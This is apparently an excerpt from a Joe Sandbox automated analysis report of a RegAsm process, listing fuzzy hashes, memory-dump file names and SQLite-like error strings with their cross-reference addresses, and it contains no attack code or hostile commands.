                                              • Opcode Fuzzy Hash: dc236a126485f08d86e4c28110e65b6d50574dca7cb99f04bbae3ad1e7bfa1fb
                                              • Instruction Fuzzy Hash: 6D51DFF1E00311AFCB048F25C8C4A97BBA5FF24724F194269F8599B242D331EA50CBA6
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B7397E0
                                              • %s at line %d of [%.10s], xrefs: 1B7397EF
                                              • database corruption, xrefs: 1B7397EA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-2528248365
                                              • Opcode ID: 52614510e72b40acfc3a68f9d1d64f481a348e4aaf380c84b9896485ff7e3af5
                                              • Instruction ID: afffacdda87d5fad638239fa97b6257fdb0b3b1c3df5d03181008294fcbc4139
                                              • Opcode Fuzzy Hash: 52614510e72b40acfc3a68f9d1d64f481a348e4aaf380c84b9896485ff7e3af5
                                              • Instruction Fuzzy Hash: 134129766057918ED7218F7C94406D7FFE0DF41212F4808AEF2D78B6A3E222E485D7A1
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B805976
                                              • %s at line %d of [%.10s], xrefs: 1B805985
                                              • misuse, xrefs: 1B805980
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                              • API String ID: 0-3564305576
                                              • Opcode ID: cb516bb8f5b7ba2388271015c1123836f86eebca8083da12c88e792d636d5833
                                              • Instruction ID: ea08cb7962bf142187ed3b2fcc3de04280fdd189cc96107509862979ce0a173e
                                              • Opcode Fuzzy Hash: cb516bb8f5b7ba2388271015c1123836f86eebca8083da12c88e792d636d5833
                                              • Instruction Fuzzy Hash: F9411676D043419FD7108B14DCC1BDAB7E8AF857A0F85056AF8849B201EB39E994D7B2
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B75D2F7
                                              • %s at line %d of [%.10s], xrefs: 1B75D306
                                              • database corruption, xrefs: 1B75D301
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-2528248365
                                              • Opcode ID: 676c9c645d159cb82f0adf01604249b47c3fe17b10e13ae1fcd830eaca8a1e21
                                              • Instruction ID: 95414c1a45e75e132a4978f259c11df15026b92562d6d873e9d26bb7e5ee822c
                                              • Opcode Fuzzy Hash: 676c9c645d159cb82f0adf01604249b47c3fe17b10e13ae1fcd830eaca8a1e21
                                              • Instruction Fuzzy Hash: E73105B6905301AFD7119B14DC01EDFB7E8EF84364F050868F98593252E722F942CBE2
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6C53FE
                                              • %s at line %d of [%.10s], xrefs: 1B6C540D
                                              • database corruption, xrefs: 1B6C5408
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-2528248365
                                              • Opcode ID: 701208fe915a2724154972895e81adee301eb8ddc2b213a77409bf6a68a9205f
                                              • Instruction ID: c848a5614e9b13dcf475d6555531e3d097269b1c285d65a16cb5f560b22db1e9
                                              • Opcode Fuzzy Hash: 701208fe915a2724154972895e81adee301eb8ddc2b213a77409bf6a68a9205f
                                              • Instruction Fuzzy Hash: 8F3188A664079146D7219F389C437E7B7E0DF61713F44446EE9CAC7682E322F496C3A1
                                              Strings
                                              • error in tokenizer constructor, xrefs: 1B7A7F92
                                              • no such tokenizer: %s, xrefs: 1B7A7F1B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: error in tokenizer constructor$no such tokenizer: %s
                                              • API String ID: 0-815501780
                                              • Opcode ID: 9bb01167e75a8b2a9e16ed86fc73ef61f88482903f76b982c2ad1632baa17903
                                              • Instruction ID: e31947b7e73a9e118279be435c4315c28a71ea53e6711a6a17eb39f6b4b7f05b
                                              • Opcode Fuzzy Hash: 9bb01167e75a8b2a9e16ed86fc73ef61f88482903f76b982c2ad1632baa17903
                                              • Instruction Fuzzy Hash: A631A1767012159FCB50CF29D881AAAF3E4EF84665F19066DF989DB300E332E946CB61
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6D146B
                                              • %s at line %d of [%.10s], xrefs: 1B6D147A
                                              • database corruption, xrefs: 1B6D1475
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-2528248365
                                              • Opcode ID: cda1f4674fc9e0d443267315f7b2c8a8435f03721a8369a04b2ea5debfde29d6
                                              • Instruction ID: d8db1b6b07e603a14f87b40291c9df3b0e02a131b4922e80b0aabbbcf6874157
                                              • Opcode Fuzzy Hash: cda1f4674fc9e0d443267315f7b2c8a8435f03721a8369a04b2ea5debfde29d6
                                              • Instruction Fuzzy Hash: 9331AFB56093918FC310CF29D9409A6FBE0EF95215B04859EE4C68BA42D731E549CBA1
                                              Strings
                                              • second argument to nth_value must be a positive integer, xrefs: 1B68F0C4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: second argument to nth_value must be a positive integer
                                              • API String ID: 0-2620530100
                                              • Opcode ID: acfa9e9f1571f074bba19d4bc7683fefb9f801085ad9abd6739aa8aacbe116ce
                                              • Instruction ID: 4a027025d62c41f922e044dd8b905d2f5fa7e5a22209007b0eef5b364a8d1062
                                              • Opcode Fuzzy Hash: acfa9e9f1571f074bba19d4bc7683fefb9f801085ad9abd6739aa8aacbe116ce
                                              • Instruction Fuzzy Hash: 03313AF69003029FCF11BF14DC426DB73A0BF60720F404E29FAA5A6290F732E95486A2
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6C52F2
                                              • %s at line %d of [%.10s], xrefs: 1B6C5301
                                              • database corruption, xrefs: 1B6C52FC
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-2528248365
                                              • Opcode ID: 622937c52ecec9d0ff0b942e4debfe362ebfa0ab61e2a8da2b6b3cee58bb70e8
                                              • Instruction ID: 6818d26140c373d954816d5940197227e22b238c79d679ffdddb094d9853fbbe
                                              • Opcode Fuzzy Hash: 622937c52ecec9d0ff0b942e4debfe362ebfa0ab61e2a8da2b6b3cee58bb70e8
                                              • Instruction Fuzzy Hash: 4F11577760121067CF105A58FC42CDBBFE5EFC46B6F090565FA4857222E322D921D3B2
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6CFDE6, 1B6CFE61
                                              • %s at line %d of [%.10s], xrefs: 1B6CFE82
                                              • database corruption, xrefs: 1B6CFE7D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-2528248365
                                              • Opcode ID: 09f124fa045fb16c8a23724289404ae3c6aaf40de592ea2384ce889ce77ccea6
                                              • Instruction ID: 498f403fa6098da58e200b3085336dd01bf878e83a0c9af17046ca26c0e08500
                                              • Opcode Fuzzy Hash: 09f124fa045fb16c8a23724289404ae3c6aaf40de592ea2384ce889ce77ccea6
                                              • Instruction Fuzzy Hash: 84311AA85152818AD3159F24C4003A7BA61FF25749F68C4CDE4498F753E37BC8C7DBAA
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B68B229
                                              • %s at line %d of [%.10s], xrefs: 1B68B238
                                              • misuse, xrefs: 1B68B233
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                              • API String ID: 0-3564305576
                                              • Opcode ID: 31096e342c90ce35fcd688bd4e3cd733d7a0b9fd47d1f3fc4eb9176e9af5466c
                                              • Instruction ID: aa97c34b0e3f6c9ff311784545a95b1a34013496a722e6ddbdb38206fdbf1240
                                              • Opcode Fuzzy Hash: 31096e342c90ce35fcd688bd4e3cd733d7a0b9fd47d1f3fc4eb9176e9af5466c
                                              • Instruction Fuzzy Hash: D011D5F5600701ABDB019A28AC95EEF77A9BFE4604F494428F955DB201EB31E54AC3A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s%s
                                              • API String ID: 0-3252725368
                                              • Opcode ID: 2ca2f305d3c5e2115096bf6b50b73fa11b054596cb2ea0397d137ab7ac7ea2fb
                                              • Instruction ID: 2eb56e3e4c32996a0c6f3677e085c6666eb725d6cc9b1ab35b1ed78b47d8a13a
                                              • Opcode Fuzzy Hash: 2ca2f305d3c5e2115096bf6b50b73fa11b054596cb2ea0397d137ab7ac7ea2fb
                                              • Instruction Fuzzy Hash: 021172F59803219BDB01AF15DC88ADA33A8FFA0A59F040166F99CD6204D735D558CBA2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: integer overflow
                                              • API String ID: 0-1678498654
                                              • Opcode ID: 2b4c084d6aaa49dbb956e9d8bc1b0563db667519b4249dd884b1d33249f2ec45
                                              • Instruction ID: fdc83cbb64bbeb7aa4681a803989090e4d92c91391dc2dcdceed152caea8429d
                                              • Opcode Fuzzy Hash: 2b4c084d6aaa49dbb956e9d8bc1b0563db667519b4249dd884b1d33249f2ec45
                                              • Instruction Fuzzy Hash: 9E11BFB5C04B11AEDF01BF28BC05BCA37A16F22325F060799E9955A1A2E760E1D8C7D2
                                              Strings
                                              • JSON path error near '%q', xrefs: 1B731F92
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: JSON path error near '%q'
                                              • API String ID: 0-481711382
                                              • Opcode ID: 6387bbb5c2de137364cbc637184d179a8d49d550bb7483a2aa7ab1d617a21ac4
                                              • Instruction ID: 0d723de28ace804233e01c0edf374ed7295735238270364e8b331116e5dc0d56
                                              • Opcode Fuzzy Hash: 6387bbb5c2de137364cbc637184d179a8d49d550bb7483a2aa7ab1d617a21ac4
                                              • Instruction Fuzzy Hash: 5F0104B260A2116EDB109A649C01BDB7BD4DF41321F10062CF895962E1EB72A811C3E2
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B691E53
                                              • %s at line %d of [%.10s], xrefs: 1B691E63
                                              • misuse, xrefs: 1B691E59
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
